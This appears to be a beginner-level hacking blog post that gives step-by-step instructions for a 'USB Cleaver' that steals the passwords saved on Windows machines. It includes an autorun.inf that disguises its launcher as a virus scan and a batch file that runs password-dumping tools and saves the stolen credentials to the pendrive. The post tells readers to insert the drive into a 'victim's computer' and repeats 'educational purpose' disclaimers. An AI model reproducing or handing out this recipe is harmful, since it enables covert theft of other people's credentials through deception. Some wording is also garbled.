How to Hack Windows: Beginner Level Part -6
How to Hack Windows saved Passwords
Windows OS will allow you to store a lot of password in your system itself.The passwords from the application can be stored in the windows which are unencrypted one.But in the case of Linux, the story is totally different.While these features are convenient for users, it became the biggest trouble to the organization. So the only lot of organizations don’t allow us to pendrivers inside the organization.There is the possibility of vulnerability spreading, virus and lot more security breaches may happen. We know that windows stores the password on daily basis. Most of the common users will not think to know this stuffs.They just surf just like dump drove cattle, but I am sure if your reading this then your really a great minded to understand the technology. We are about to see how a hacker can steal our data through a USB pendrive. – how to hack windows
- How to Hack : Beginner Level Part -1
- Types of Hackers: Beginner Level Part -2
- Types of Hacking: Beginner Level Part -3
- How to be Anonymous: Beginner Level Part -4
- Hacker Dictionary: Beginner Level Part – 5
- How to Hack Windows: Beginner Level Part -6
- Different phases of ethical hacking: Beginner Level Part – 7
This is purely for educational purpose alone
Just to explain the concept, we are going to collect some password stealing tools, tools that are freely available on the internet and capable of stealing the passwords stored in the browsers or other windows files.
We need to create a batch program that will execute the combined programs and save them as a text file.
To further spice up the penetration testing demonstration, let’s make a batch auto executable file in a pendrive. This is for educational purpose alone to show how a hacker can do this method.
Once the pendrive plugged in the USB pendrive will start copying the hash files ( password file)
Basic Windows Application for Viewing Password
MessenPass – This application shows you the password shows you the password stored in messing applications.
Mail PassView – This is a small recovery tool just executes and show you the password of the outlook configured in the windows system.
IE Passview – IE passview will show you the password stored in the Windows Internet Explorer.
Protected storage pass viewer(PSPV) – It will an all rounder tool which will execute the internet explorer, Outlook Express, and MSN Explorer.
Password Fox – This tool will show you the password stored in the Mozilla Firefox application.
ChromePass – This tool will show you the password stored in Google Chrome.
Steps for making USB Cleaver :
1. Download all the following five tools and copy those executables (.exe files) into the pendrive i.e. Copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Now start creating a new Notepad and copy paste this information in that text.
[autorun] open=launch.bat ACTION= Perform a Virus Scan
Save that Notepad and then rename it from “New Text Document.txt” to “autorun.inf”
Then copy the “autorun.inf” file into your USB pendrive.
3. Now create new Notepad and start adding the commands below
start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt
4. Save the notepad and rename it from “New Text Document.txt” to “launch.bat”
5. Copy the “launch.bat” file into your USB drive. Now the USB pendrive Password stealer is ready, all you have to do is insert it into your victim’s computer and a popup will appear. In the popup window, select the option “launch virus scan.”
Now you can see the password file in you pendrive in TXT file.
This is for purely for educational purpose, to bring awareness that this activity can be done by black hats. This tool can be downloaded in the web, use these tools at your own risk!
Purely for educational purposes. Use these tools at your own risk! how to hack windows